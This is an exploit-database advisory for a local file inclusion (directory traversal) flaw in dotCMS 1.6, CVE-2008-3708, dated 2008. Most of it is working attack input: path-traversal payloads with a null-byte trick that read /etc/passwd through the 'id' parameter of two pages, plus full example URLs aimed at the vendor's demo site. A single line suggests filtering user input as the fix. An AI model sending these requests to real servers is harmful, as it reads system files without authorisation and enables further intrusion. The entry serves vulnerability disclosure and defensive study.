dotCMS 1.6 id Multiple Local File Inclusion Vulnerabilities

2008-08-15T00:00:00
ID EDB-ID:6247
Type exploitdb
Reporter Don
Modified 2008-08-15T00:00:00

Description

dotCMS 1.6 (id) Multiple Local File Inclusion Vulnerabilities. CVE-2008-3708. Webapps exploit for php platform

                                        
                                            ++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ script:dotCMS
+ home: http://www.dotcms.org
+ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
+ founder: Don of h4cky0u.org
+ Vulnerability: Directory traversal
++++++++++++++++++++++++++++++++++++++++++++++++++++++

exploit:
/index.dot?id=../../../../../../../../etc/passwd%00.jpg
/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

example:
http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

solution:
Script should filter meta characters from user input.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-08-15]